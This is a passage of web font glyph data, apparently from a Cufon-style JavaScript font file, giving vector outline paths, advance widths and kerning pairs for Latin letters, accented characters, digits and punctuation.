0xm193,-26r-4,26r-65,0v0,-46,41,-59,53,-93v-1,-17,-24,-4,-37,0r5,-28v25,-11,67,-14,59,28v-6,30,-32,42,-47,67r36,0","w":223},{"d":"131,-211r-76,0r3,-18r76,0","w":126},{"d":"90,-210r-30,171v63,3,62,-68,69,-124v4,-31,-7,-50,-39,-47xm97,-248v124,-3,76,207,11,240v-24,13,-63,7,-98,8r44,-248r43,0","w":180,"k":{"Z":9,"Y":11,"X":7,"T":7,"A":4,".":14,",":18}},{"d":"54,-248v69,-8,125,10,109,85v-10,49,-31,85,-95,79r-15,84r-43,0xm75,-123v44,8,52,-38,46,-75v-2,-12,-16,-13,-31,-12","w":155,"k":{"q":7,"o":7,"g":7,"e":7,"d":7,"c":7,"a":7,"Z":10,"X":6,"J":4,"A":9,".":14,",":14,"'":-4}},{"d":"168,-321v-4,20,-12,39,-34,39v-22,1,-37,-34,-46,-3r-20,0v4,-22,13,-40,34,-40v20,0,38,35,46,4r20,0xm20,0r-38,0r102,-248r47,0r15,248r-43,0r-2,-56r-59,0xm99,-94r1,-116r-43,116r42,0","w":161},{"d":"140,-249v-4,20,-12,39,-34,39v-22,1,-36,-34,-46,-3r-20,0v5,-21,14,-40,35,-40v19,0,37,34,45,4r20,0xm99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm74,-184v14,1,29,12,37,22v7,-14,19,-21,42,-18v-15,43,-21,99,-30,148r18,0r-5,32r-40,0v-5,-3,-9,-11,-11,-18v-11,9,-25,22,-41,22v-26,0,-37,-20,-34,-49v5,-56,8,-132,64,-139"},{"d":"69,-93v-6,38,43,25,62,13r-7,41v-11,4,-24,6,-37,7r-8,46r-25,0r8,-46v-67,-19,-31,-186,33,-185r8,-46r25,0r-8,46v12,1,25,5,34,9r-7,39v-10,-7,-21,-12,-35,-12v-42,-2,-37,55,-43,88","w":154},{"d":"96,-248r-44,248r-42,0r44,-248r42,0xm88,-277r-31,0r46,-48r33,0","w":93},{"d":"68,-161v14,-18,65,-38,72,-1v15,-16,56,-35,69,-8v8,44,-12,95,-16,138r18,0r-5,32r-60,0r23,-131v4,-26,-15,-16,-26,-5r-4,5r-23,131r-41,0r23,-131v4,-26,-15,-16,-26,-5r-5,5r-23,131r-41,0r27,-157v1,-9,1,-17,1,-23r25,0v5,4,10,11,12,19","w":221,"k":{"z":-7,".":-7,"'":13}},{"d":"129,-100r-33,-35r6,-31r69,59r-3,16r-90,59r6,-34xm54,-100r-33,-35r5,-31r69,59r-2,16r-90,59r6,-34","w":184},{"d":"13,-31r43,0r-40,89r-29,0","w":87,"k":{"'":61,"\"":61}},{"d":"87,-205r-31,0r46,-48r33,0","w":141},{"w":64},{"d":"96,-248r-44,248r-42,0r44,-248r42,0xm73,-325r30,48r-29,0r-32,-48r31,0","w":93},{"d":"138,-134v0,63,-10,138,-78,138v-33,-1,-49,-16,-49,-50v0,-63,9,-138,78,-138v33,1,49,16,49,50xm93,-90v5,-30,15,-71,-17,-60v-19,21,-25,74,-25,112v0,16,25,12,29,0v5,-15,9,-30,13,-52xm100,-205r-31,0r46,-48r33,0","w":149},{"d":"95,-117v2,-20,9,-36,-9,-36v-20,0,-19,15,-25,36r34,0xm109,-7v-34,16,-102,19,-98,-35v4,-62,10,-142,80,-142v56,0,47,54,36,98r-72,0v-6,33,-9,61,28,54v10,-2,21,-6,33,-12xm124,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm68,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":142},{"d":"99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm74,-184v14,1,29,12,37,22v7,-14,19,-21,42,-18v-15,43,-21,99,-30,148r18,0r-5,32r-40,0v-5,-3,-9,-11,-11,-18v-11,9,-25,22,-41,22v-26,0,-37,-20,-34,-49v5,-56,8,-132,64,-139xm91,-205r-31,0r46,-48r33,0"},{"d":"20,-79v-21,-29,23,-64,47,-40v19,27,-22,65,-47,40","w":87},{"d":"168,-186v0,79,-8,188,-95,190v-42,1,-56,-24,-56,-66v0,-78,8,-188,94,-190v42,-1,57,24,57,66xm126,-197v0,-23,-36,-19,-42,0v-11,37,-25,99,-25,145v0,24,36,19,42,0v11,-37,24,-99,25,-145xm114,-325r30,48r-29,0r-32,-48r31,0","w":173},{"d":"42,-18v-8,14,-19,21,-43,18v23,-76,31,-166,48,-248r41,0r-14,80v25,-26,74,-18,67,33v-7,57,-8,132,-63,139v-15,-1,-27,-12,-36,-22xm53,-46v4,11,21,24,30,7v10,-23,17,-71,18,-102v-7,-19,-26,2,-33,9","k":{"'":16}},{"w":64},{"d":"37,-136v-20,-28,25,-64,47,-39v21,26,-24,66,-47,39xm31,-103r41,0r-31,171r-41,0","w":101},{"d":"95,-117v2,-20,9,-36,-9,-36v-20,0,-19,15,-25,36r34,0xm109,-7v-34,16,-102,19,-98,-35v4,-62,10,-142,80,-142v56,0,47,54,36,98r-72,0v-6,33,-9,61,28,54v10,-2,21,-6,33,-12xm101,-205r-31,0r46,-48r33,0","w":142},{"d":"93,-148r-4,27r-65,0v1,-45,39,-60,53,-93v-1,-17,-24,-4,-37,0r5,-28v23,-12,69,-14,59,28v-7,29,-32,42,-47,66r36,0","w":97},{"d":"46,-248r39,0r-23,88r-24,0xm113,-248r39,0r-23,88r-24,0","w":142,"k":{"T":-7,"A":18}},{"d":"20,0r-38,0r102,-248r47,0r15,248r-43,0r-2,-56r-59,0xm99,-94r1,-116r-43,116r42,0xm122,-277r-31,0r46,-48r33,0","w":161},{"d":"15,-85r5,-28r48,0r9,-51r27,0r-9,51r48,0r-5,28r-48,0r-8,44r-27,0r8,-44r-48,0xm5,-27r122,0r-4,27r-123,0","w":154},{"d":"20,0r-38,0r102,-248r47,0r15,248r-43,0r-2,-56r-59,0xm99,-94r1,-116r-43,116r42,0xm139,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm83,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":161},{"d":"175,-321v-2,33,-40,53,-62,25v-10,-7,-15,0,-19,11r-20,0v3,-35,40,-53,62,-25v10,7,15,0,18,-11r21,0xm168,-186v0,79,-8,188,-95,190v-42,1,-56,-24,-56,-66v0,-78,8,-188,94,-190v42,-1,57,24,57,66xm126,-197v0,-23,-36,-19,-42,0v-11,37,-25,99,-25,145v0,24,36,19,42,0v11,-37,24,-99,25,-145","w":173},{"d":"122,-175v21,27,-24,65,-47,39v-20,-27,24,-65,47,-39xm96,-27v-37,-7,-61,24,-44,55v17,11,49,3,65,-4r-7,40v-48,18,-126,9,-106,-62v10,-34,23,-60,58,-66r7,-39r41,0","w":147},{"d":"53,-46v4,11,21,24,30,7v10,-23,17,-71,18,-102v-7,-19,-26,2,-33,9xm78,4v-11,-1,-25,-9,-32,-16r-14,80r-41,0r39,-225v1,-9,1,-17,1,-23v20,-1,34,-1,36,18v11,-9,25,-22,41,-22v26,0,36,19,33,49v-5,57,-8,132,-63,139","k":{"'":16}},{"d":"118,-60r21,0r-6,32r-21,0r-11,62r-41,0r11,-62r-81,0r4,-24r112,-163r39,0xm77,-60r20,-98v-18,35,-41,66,-62,98r42,0","w":154,"k":{"4":-7}},{"d":"120,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm64,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":141},{"d":"95,-248r-34,191v-2,14,4,21,19,21v15,0,23,-7,25,-21r34,-191r40,0r-35,193v1,60,-106,83,-125,24v-2,-7,-3,-15,-1,-24r35,-193r42,0xm125,-277r-31,0r46,-48r33,0","w":174},{"d":"52,-32v37,18,39,-42,45,-77xm98,-144v-3,-15,-26,-9,-29,2v-9,19,-15,52,-18,79xm11,-41v0,-78,24,-169,107,-136r12,-21r20,0r-20,33v21,69,-4,196,-96,164r-12,19r-19,0r18,-30v-5,-7,-9,-16,-10,-29","w":149},{"d":"78,0r-42,0r17,-96r-26,-152r43,0r15,101r52,-101r38,0r-80,152","w":146,"k":{"z":14,"x":14,"v":11,"u":18,"s":16,"r":11,"q":18,"p":11,"o":22,"n":11,"m":11,"g":22,"e":25,"d":22,"c":22,"a":22,"S":4,"O":5,"G":5,"E":4,"C":5,"A":9,";":7,":":7,".":25,",":25,"'":-7}},{"d":"88,-117v-56,-16,18,-139,-57,-137r4,-22v50,1,69,38,57,97v-7,35,6,49,32,55r-3,17v-29,9,-46,20,-51,55v-8,55,-36,95,-91,97r4,-25v78,-1,39,-117,105,-137","w":133},{"d":"60,-165r-32,13r8,-42v24,-9,40,-25,76,-21r-31,176r29,0r-7,39r-101,0r7,-39r29,0","w":132},{"d":"-8,-10v29,16,80,12,78,-29v4,-23,0,-40,-24,-40r-28,0r6,-37v43,9,73,-18,57,-58v-15,-11,-42,0,-57,4r7,-41v31,-11,93,-13,95,28v2,33,-8,71,-28,85v37,40,5,148,-63,135v-17,1,-38,-4,-49,-8","w":136},{"d":"44,-248r43,0r-23,88r-28,0","w":74,"k":{"t":-6,"s":4,"T":-7,"S":-4,"A":18}},{"d":"150,-200v-21,-17,-63,-20,-67,13v-3,7,-6,17,-8,29v21,-10,56,-8,63,13v16,52,1,149,-69,149v-39,0,-51,-21,-49,-62v5,-91,20,-236,138,-182xm62,-73v-4,24,-5,50,20,39v16,-16,26,-67,16,-93v-8,-6,-20,-2,-29,3v-4,22,-6,39,-7,51","w":158},{"d":"94,-62v-6,29,19,20,27,7r12,-70v-3,-6,-8,-13,-15,-14v-22,6,-18,54,-24,77xm112,-167v14,0,23,9,30,18v8,-13,15,-17,35,-15v-12,36,-20,82,-23,124v1,3,3,4,6,4v26,-8,30,-73,32,-106v2,-41,-18,-56,-60,-56v-86,0,-87,85,-97,158v-10,70,83,65,123,39r-4,23v-34,18,-115,23,-127,-14v-34,-100,12,-264,148,-219v58,18,33,141,9,178v-13,21,-52,28,-61,2v-21,25,-68,24,-63,-22v5,-46,7,-114,52,-114","w":219},{"d":"168,-186v0,79,-8,188,-95,190v-42,1,-56,-24,-56,-66v0,-78,8,-188,94,-190v42,-1,57,24,57,66xm126,-197v0,-23,-36,-19,-42,0v-11,37,-25,99,-25,145v0,24,36,19,42,0v11,-37,24,-99,25,-145xm144,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm88,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":173},{"d":"15,-85r5,-28r48,0r9,-51r27,0r-9,51r48,0r-5,28r-48,0r-9,51r-27,0r9,-51r-48,0","w":154},{"d":"53,0r-43,0r44,-248r43,0r-17,98r43,0r17,-98r43,0r-44,248r-43,0r20,-111r-44,0","w":181},{"d":"78,0r-42,0r17,-96r-26,-152r43,0r15,101r52,-101r38,0r-80,152xm115,-277r-31,0r46,-48r33,0","w":146},{"d":"75,-32r-6,32r-60,0r26,-148r-19,0r6,-32r60,0r-26,148r19,0xm48,-210v-18,-25,20,-56,41,-35v18,23,-19,57,-41,35","w":90,"k":{"z":-4,".":-4}},{"d":"54,-42v0,17,22,11,26,-3v6,-23,12,-46,18,-80v-41,-22,-44,49,-44,83xm20,-16v-25,-60,13,-177,84,-142v1,-13,2,-25,-2,-36r-32,17r5,-30r18,-9v-7,-12,-18,-27,-29,-32v25,0,53,-5,59,16r35,-18r-5,29r-19,10v20,58,-4,147,-24,190v-14,29,-77,36,-90,5","w":154},{"d":"154,-194v-13,-16,-55,-24,-60,6v-2,6,-5,15,-7,25r43,0r-4,25r-44,0r-5,27r44,0r-4,26r-43,0v-16,49,30,55,56,28r-8,50v-13,6,-32,11,-50,11v-43,-1,-46,-42,-41,-89r-17,0r4,-26r16,0r5,-27r-16,0r4,-25r18,0v11,-55,31,-104,97,-85v8,2,15,5,21,8"},{"d":"118,-39r-7,39r-101,0r44,-248r97,0r-7,38r-54,0r-10,60r50,0r-7,39r-51,0r-12,72r58,0xm111,-277r-31,0r46,-48r33,0","w":142},{"d":"134,0v-24,0,-50,4,-51,-19v-27,31,-85,36,-73,-30r23,-131r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-26,148r19,0xm120,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm64,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":150},{"d":"19,-176r7,-39r113,0v-4,73,-43,111,-70,160v-13,23,-14,60,-20,89r-41,0v11,-53,20,-109,50,-142v17,-18,29,-38,35,-68r-74,0","w":133,"k":{"4":11,".":25,",":18}},{"d":"95,-248r-34,191v-2,14,4,21,19,21v15,0,23,-7,25,-21r34,-191r40,0r-35,193v1,60,-106,83,-125,24v-2,-7,-3,-15,-1,-24r35,-193r42,0","w":174},{"d":"179,-196v1,90,-32,175,-129,146v-61,-45,-24,-210,67,-201v39,4,61,16,62,55xm39,-108v-3,33,14,44,46,45v67,2,71,-67,76,-124v3,-32,-12,-45,-46,-45v-68,0,-70,67,-76,124xm99,-136r-6,0r-8,43r-23,0r20,-110v30,-2,62,-1,54,34v-3,10,-6,21,-14,26r8,50r-23,0xm101,-181r-4,24v14,6,23,-19,11,-24r-7,0","w":180},{"d":"124,-130v33,42,8,142,-58,134v-81,10,-56,-114,-17,-139v-23,-42,-3,-123,56,-117v71,-9,52,97,19,122xm77,-165v-4,20,18,23,27,11v6,-13,23,-64,-2,-64v-25,0,-21,33,-25,53xm98,-93v0,-13,-1,-21,-14,-21v-29,0,-25,38,-30,62v0,13,2,21,15,21v28,-1,24,-39,29,-62","w":158},{"d":"102,-12r-87,-79r3,-16r115,-79r-7,40r-72,49r55,49","w":133},{"d":"26,-5v-21,-27,24,-65,47,-39v20,27,-24,65,-47,39xm51,-153v37,7,62,-23,45,-55v-18,-11,-48,-2,-65,4r7,-41v51,-16,125,-8,106,63v-9,35,-23,60,-58,66r-7,39r-41,0","w":147},{"d":"76,-166v0,31,61,10,91,16r-7,37r-17,0v-5,37,-15,72,-16,113v-16,0,-31,2,-33,-12v-24,24,-85,21,-85,-23v0,-40,10,-88,40,-99v-38,-50,7,-143,89,-115r23,4r-8,39v-13,-3,-28,-7,-43,-7v-27,-2,-34,22,-34,47xm50,-54v-2,27,30,20,41,7r11,-66v-42,-6,-50,25,-52,59","w":167},{"d":"53,-46v4,11,21,24,30,7v10,-23,17,-71,18,-102v-7,-19,-26,2,-33,9xm78,4v-11,-1,-25,-9,-32,-16r-14,80r-41,0r56,-316r41,0r-14,80v25,-26,74,-18,67,33v-8,57,-8,132,-63,139"},{"d":"123,-57r-26,0r5,-30r-78,0r5,-26r104,0","w":159},{"d":"85,-248r35,0r-12,49r49,-19r4,33r-49,12r24,37r-31,20r-19,-40r-33,41r-25,-21r38,-36r-45,-12r16,-33r43,18","w":149},{"d":"138,-134v0,63,-10,138,-78,138v-33,-1,-49,-16,-49,-50v0,-63,9,-138,78,-138v33,1,49,16,49,50xm93,-90v5,-30,15,-71,-17,-60v-19,21,-25,74,-25,112v0,16,25,12,29,0v5,-15,9,-30,13,-52","w":149,"k":{"'":16}},{"d":"31,-180v26,-3,39,5,38,29v14,-11,35,-34,53,-33r-9,52v-22,-9,-34,9,-49,18r-20,114r-41,0r27,-157v1,-9,1,-17,1,-23","w":105,"k":{".":11,",":18}},{"d":"37,-208r5,-29v13,-5,24,-13,45,-11r-18,100r14,0r-5,27r-56,0r4,-27r14,0r12,-67xm174,-248r27,0r-145,248r-27,0xm190,-51r-4,21r-9,0r-6,30r-27,0r5,-30r-39,0r3,-16r57,-81r24,0r-14,76r10,0xm153,-51r7,-34v-6,12,-14,23,-22,34r15,0","w":216},{"d":"53,-44v21,28,-24,64,-46,39v-20,-28,24,-65,46,-39xm75,-168v21,28,-24,64,-46,39v-21,-25,22,-64,46,-39","w":87},{"d":"134,0v-24,0,-50,4,-51,-19v-12,9,-28,22,-41,22r-12,65r-41,0r44,-248r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-26,148r19,0","w":150},{"d":"61,-44v20,28,-25,64,-47,39v-20,-28,24,-64,47,-39xm98,-248r-31,171r-41,0r31,-171r41,0","w":101},{"d":"84,-295r-18,18r-31,0r46,-48r15,0r30,48r-30,0xm96,-248r-44,248r-42,0r44,-248r42,0","w":93},{"d":"80,-180r-36,200v-2,44,-38,57,-84,47r6,-33v16,6,35,4,38,-15r35,-199r41,0xm46,-210v-18,-25,20,-56,41,-35v18,23,-19,57,-41,35","w":86},{"d":"14,-14v22,17,64,19,68,-14v3,-7,5,-17,7,-29v-47,21,-80,-14,-65,-77v11,-46,19,-83,71,-84v83,-2,38,115,33,171v-5,64,-57,104,-121,73xm62,-110v-6,26,15,30,33,20v6,-32,9,-51,9,-79v-1,-10,-2,-14,-12,-14v-28,3,-24,48,-30,73","w":158},{"d":"95,-248r-34,191v-2,14,4,21,19,21v15,0,23,-7,25,-21r34,-191r40,0r-35,193v1,60,-106,83,-125,24v-2,-7,-3,-15,-1,-24r35,-193r42,0xm107,-325r30,48r-29,0r-32,-48r31,0","w":174},{"d":"13,-31r43,0r-40,89r-29,0xm75,-168v21,28,-24,64,-46,39v-21,-25,22,-64,46,-39","w":87},{"d":"75,-32r-6,32r-60,0r26,-148r-19,0r6,-32r60,0r-26,148r19,0xm60,-205r-31,0r46,-48r33,0","w":90},{"d":"63,-89r-22,123r-28,0r22,-123r28,0xm91,-248r-22,122r-28,0r22,-122r28,0","w":98},{"d":"118,-39r-7,39r-101,0r44,-248r97,0r-7,38r-54,0r-10,60r50,0r-7,39r-51,0r-12,72r58,0xm100,-325r30,48r-29,0r-32,-48r31,0","w":142},{"d":"17,-60v12,-87,13,-217,124,-188v9,3,18,6,25,9r-9,45v-15,-11,-58,-27,-70,-1v-16,34,-30,97,-27,146v1,22,25,21,37,6r11,-64r-17,0r7,-39r60,0v-7,49,-20,93,-22,146v-16,0,-31,3,-35,-11v-33,31,-92,10,-84,-49","w":167,"k":{"'":4}},{"d":"37,-208r5,-29v13,-5,24,-13,45,-11r-18,100r14,0r-5,27r-56,0r4,-27r14,0r12,-67","w":97},{"d":"76,-252v50,-3,36,74,17,93v-28,29,-83,7,-65,-40v5,-31,17,-51,48,-53xm50,0r-23,0r145,-248r23,0xm117,-10v-24,-46,28,-126,73,-79v15,35,-2,96,-44,93v-13,0,-24,-4,-29,-14xm73,-224v-8,0,-13,9,-16,25v-3,16,-1,24,7,24v8,0,13,-8,16,-24v3,-16,1,-25,-7,-25xm149,-25v8,0,14,-8,17,-24v3,-16,0,-25,-8,-25v-8,0,-13,9,-16,25v-3,16,-1,24,7,24","w":217},{"d":"34,-44r-17,-20r43,-36r-29,-35r21,-19r29,36r42,-36r17,20r-42,36r29,35r-21,19r-29,-36","w":154},{"d":"14,-148r6,-32r24,0v1,-54,36,-82,95,-67r-6,33v-17,-4,-45,-8,-44,15r-4,19r42,0r-6,32r-41,0r-30,168v-3,42,-37,58,-84,47r6,-33v16,5,34,4,37,-15r30,-167r-25,0","w":105,"k":{"z":13,"x":11,"w":9,"v":4,"t":9,"i":4,"f":9,".":14,",":18,"'":-14,"\"":-14}},{"d":"25,0r-42,0r75,-125r-20,-91r-19,0r6,-32r50,0r14,75r43,-75r42,0r-73,121r21,95r18,0r-5,32r-50,0r-15,-79","w":146,"k":{"S":4,"Q":4,"O":4,"G":4,"C":4,";":-11,":":-11,".":-14,",":-14}},{"d":"100,-248r-36,202v-2,44,-39,55,-88,47r6,-38v19,0,37,6,41,-17r34,-194r43,0","w":97},{"d":"126,-197v0,-23,-36,-19,-42,0v-11,37,-25,99,-25,145v0,24,36,19,42,0v11,-37,24,-99,25,-145xm56,-225v30,-48,123,-31,112,39v-11,73,-10,175,-79,189v-5,16,-4,35,16,32v6,0,12,-1,18,-3r-5,34v-46,11,-84,-13,-66,-65v-63,-19,-26,-137,-14,-187v4,-16,11,-29,18,-39","w":173,"k":{"X":4}},{"d":"80,-60v0,-27,-37,-19,-63,-20r23,-135r105,0r-7,39r-66,0r-10,60v84,-15,66,103,31,139v-21,20,-70,16,-96,5r8,-39v10,5,25,10,38,10v31,1,37,-30,37,-59","w":144},{"d":"124,-295r-18,18r-31,0r46,-48r14,0r30,48r-29,0xm168,-186v0,79,-8,188,-95,190v-42,1,-56,-24,-56,-66v0,-78,8,-188,94,-190v42,-1,57,24,57,66xm126,-197v0,-23,-36,-19,-42,0v-11,37,-25,99,-25,145v0,24,36,19,42,0v11,-37,24,-99,25,-145","w":173},{"d":"77,-14v-13,16,-56,28,-66,4v-7,-56,16,-116,22,-170r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-34,194v-2,58,-69,70,-116,46r7,-36v17,15,64,27,68,-7xm104,-205r-31,0r46,-48r33,0","w":150},{"d":"95,-253r30,48r-29,0r-32,-48r31,0","w":126},{"d":"119,-9v-46,22,-110,14,-102,-51v11,-85,12,-212,120,-187v9,2,16,6,22,9r-8,45v-13,-12,-54,-24,-65,-1v-16,31,-26,93,-25,139v9,28,53,8,66,-3","w":144},{"d":"99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm74,-184v14,1,29,12,37,22v7,-14,19,-21,42,-18v-15,43,-21,99,-30,148r18,0r-5,32r-40,0v-5,-3,-9,-11,-11,-18v-11,9,-25,22,-41,22v-26,0,-37,-20,-34,-49v5,-56,8,-132,64,-139","k":{"z":-7,".":-7,"'":18}},{"d":"95,-14v-17,24,-87,28,-85,-17v2,-43,13,-78,18,-117r-19,0r6,-32r60,0v-6,48,-24,97,-22,145v11,10,25,-1,27,-14r23,-131r41,0v-6,48,-22,96,-22,145v10,10,28,0,27,-14r23,-131r41,0r-29,149v-6,34,-71,49,-89,17","w":213,"k":{".":7}},{"d":"56,-180v6,5,10,11,12,21v17,-19,59,-39,74,-11v8,45,-12,95,-17,138r19,0r-6,32r-60,0v7,-48,21,-94,24,-144v-13,-12,-26,9,-35,17r-23,127r-41,0r27,-157v1,-9,1,-17,1,-23r25,0","w":154,"k":{"z":-7,".":-7,"'":13}},{"d":"17,-52v24,21,81,26,81,-21v17,-60,-61,-7,-69,-73v-9,-78,53,-133,126,-93r-8,44v-19,-19,-74,-30,-76,13v-16,56,60,11,68,72v11,80,-53,142,-130,102","w":155,"k":{"Y":7,"X":4,"V":4,"T":4,"'":4}},{"d":"62,-279v35,46,55,141,25,209v-20,45,-48,87,-81,119r-30,0v77,-58,139,-225,58,-328r28,0","w":119},{"d":"149,-249v-2,33,-40,53,-62,25v-10,-7,-15,1,-19,11r-20,0v3,-35,40,-53,62,-25v10,7,15,0,18,-11r21,0xm56,-180v6,5,10,11,12,21v17,-19,59,-39,74,-11v8,45,-12,95,-17,138r19,0r-6,32r-60,0v7,-48,21,-94,24,-144v-13,-12,-26,9,-35,17r-23,127r-41,0r27,-157v1,-9,1,-17,1,-23r25,0","w":154},{"d":"153,-160v-10,70,-8,164,-84,164v-91,0,-43,-154,-17,-199v23,-40,110,-30,101,35xm112,-146v11,-33,-21,-50,-32,-22v-12,30,-22,83,-22,122v0,19,28,16,33,0v7,-24,17,-70,21,-100","w":164},{"d":"67,0r-43,0r38,-210r-44,0r7,-38r130,0r-7,38r-44,0","w":123,"k":{"z":14,"y":18,"x":16,"w":14,"v":14,"u":18,"s":18,"r":14,"q":19,"p":14,"o":19,"n":14,"m":14,"g":19,"e":19,"d":19,"c":19,"a":19,"O":4,"G":4,"C":4,"A":7,";":7,":":7,".":11,",":11,"'":-11,"\"":-7}},{"d":"99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm74,-184v14,1,29,12,37,22v7,-14,19,-21,42,-18v-15,43,-21,99,-30,148r18,0r-5,32r-40,0v-5,-3,-9,-11,-11,-18v-11,9,-25,22,-41,22v-26,0,-37,-20,-34,-49v5,-56,8,-132,64,-139xm115,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm59,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17"},{"d":"183,-224r-23,0r-52,296r-24,0r52,-296r-29,0r-53,296r-24,0r39,-221v-46,3,-51,-64,-20,-86v29,-21,91,-9,138,-13","w":167},{"d":"77,-14v-13,16,-56,28,-66,4v-7,-56,16,-116,22,-170r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-34,194v-2,58,-69,70,-116,46r7,-36v17,15,64,27,68,-7","w":150,"k":{"'":7}},{"d":"168,-186v0,79,-8,188,-95,190v-42,1,-56,-24,-56,-66v0,-78,8,-188,94,-190v42,-1,57,24,57,66xm126,-197v0,-23,-36,-19,-42,0v-11,37,-25,99,-25,145v0,24,36,19,42,0v11,-37,24,-99,25,-145xm122,-277r-31,0r46,-48r33,0","w":173},{"d":"116,-39r-7,39r-99,0r44,-248r43,0r-37,209r56,0","w":126,"k":{"Y":18,"W":13,"V":14,"U":4,"T":11,"S":4,"O":4,"G":4,"C":4,";":-7,":":-11,".":-11,",":-11,"'":29,"\"":29}},{"d":"210,-210r-76,0r3,60r59,0r-7,39r-50,0r5,72r40,0r-7,39r-74,0r-2,-56r-59,0r-22,56r-38,0r102,-248r133,0xm99,-94r1,-116r-43,116r42,0","w":208},{"d":"89,2r-57,-252r23,0r57,252r-23,0","w":132},{"d":"20,0r-38,0r102,-248r47,0r15,248r-43,0r-2,-56r-59,0xm99,-94r1,-116r-43,116r42,0","w":161,"k":{"Y":9,"W":7,"V":7,"T":9,"S":4,"'":18,"\"":18}},{"d":"111,-162v7,-14,19,-21,42,-18v-22,76,-32,166,-48,248r-41,0r14,-80v-26,26,-75,17,-68,-33v7,-56,8,-132,64,-139v14,1,29,12,37,22xm99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16","k":{"'":11}},{"d":"20,0r-38,0r102,-248r47,0r15,248r-43,0r-2,-56r-59,0xm99,-94r1,-116r-43,116r42,0xm154,-302v-26,47,-104,17,-72,-33v10,-27,70,-37,77,0v3,12,0,25,-5,33xm138,-319v5,-17,-20,-25,-31,-14v-13,7,-13,35,7,34v12,0,21,-10,24,-20","w":161},{"d":"95,-117v2,-20,9,-36,-9,-36v-20,0,-19,15,-25,36r34,0xm109,-7v-34,16,-102,19,-98,-35v4,-62,10,-142,80,-142v56,0,47,54,36,98r-72,0v-6,33,-9,61,28,54v10,-2,21,-6,33,-12","w":142,"k":{"'":11}},{"d":"22,-82r6,-34r94,0r-6,34r-94,0","w":141},{"d":"27,-154v17,14,43,7,37,-19v-5,-5,-17,-2,-27,-3r5,-25v17,3,34,-3,28,-21v-9,-5,-19,2,-30,3v4,-12,-1,-31,17,-30v42,-16,54,33,30,61v22,38,-15,88,-65,63","w":97},{"d":"73,-166v13,-14,57,-29,67,-4v6,45,-13,95,-17,138r19,0r-6,32r-60,0r24,-144v-12,-11,-24,8,-33,15r-23,129r-41,0r44,-248r41,0","w":152,"k":{"z":-7,".":-7,"'":16}},{"d":"20,0r-38,0r102,-248r47,0r15,248r-43,0r-2,-56r-59,0xm99,-94r1,-116r-43,116r42,0xm104,-325r30,48r-29,0r-32,-48r31,0","w":161},{"d":"30,0r-12,-180r39,0r3,123r45,-123r38,0r-75,180r-38,0","w":129,"k":{".":18,",":18}},{"d":"138,-134v0,63,-10,138,-78,138v-33,-1,-49,-16,-49,-50v0,-63,9,-138,78,-138v33,1,49,16,49,50xm93,-90v5,-30,15,-71,-17,-60v-19,21,-25,74,-25,112v0,16,25,12,29,0v5,-15,9,-30,13,-52xm92,-253r30,48r-29,0r-32,-48r31,0","w":149},{"d":"40,0r-9,-248r42,0r0,189v19,-67,46,-126,68,-189r39,0r-96,248r-44,0","w":155,"k":{"s":13,"o":14,"g":14,"e":14,"d":14,"c":14,"a":11,"A":7,";":7,":":7,".":25,",":25,"'":-7}},{"d":"79,-149v33,6,44,-25,39,-54v-2,-10,-15,-9,-28,-9xm132,-135v38,17,20,95,-3,117v-25,24,-74,16,-119,18r44,-248v57,-4,117,-4,104,67v-4,19,-13,38,-26,46xm59,-37v43,9,60,-26,52,-64v-3,-14,-22,-11,-39,-11","w":169,"k":{"Y":11,"X":4,"V":5,"'":7}},{"d":"96,-248r-44,248r-42,0r44,-248r42,0","w":93},{"d":"57,1v-72,-10,-28,-138,-18,-189v10,-54,68,-78,120,-50r-8,45v-13,-12,-54,-24,-65,-1v-16,31,-26,93,-25,139v9,28,53,8,66,-3r-8,49v-12,5,-26,10,-42,10r-7,14v35,13,10,62,-21,58v-12,-2,-22,-6,-30,-11r4,-19v9,8,40,19,44,0v2,-11,-10,-13,-23,-12","w":144},{"d":"168,-186v0,79,-8,188,-95,190v-42,1,-56,-24,-56,-66v0,-78,8,-188,94,-190v42,-1,57,24,57,66xm126,-197v0,-23,-36,-19,-42,0v-11,37,-25,99,-25,145v0,24,36,19,42,0v11,-37,24,-99,25,-145","w":173,"k":{"Z":7,"Y":5,"X":4,"T":4}},{"d":"75,-32r-6,32r-60,0r26,-148r-19,0r6,-32r60,0r-26,148r19,0xm47,-253r30,48r-29,0r-32,-48r31,0","w":90},{"d":"98,-223r-18,18r-32,0r47,-48r14,0r30,48r-30,0xm138,-134v0,63,-10,138,-78,138v-33,-1,-49,-16,-49,-50v0,-63,9,-138,78,-138v33,1,49,16,49,50xm93,-90v5,-30,15,-71,-17,-60v-19,21,-25,74,-25,112v0,16,25,12,29,0v5,-15,9,-30,13,-52","w":14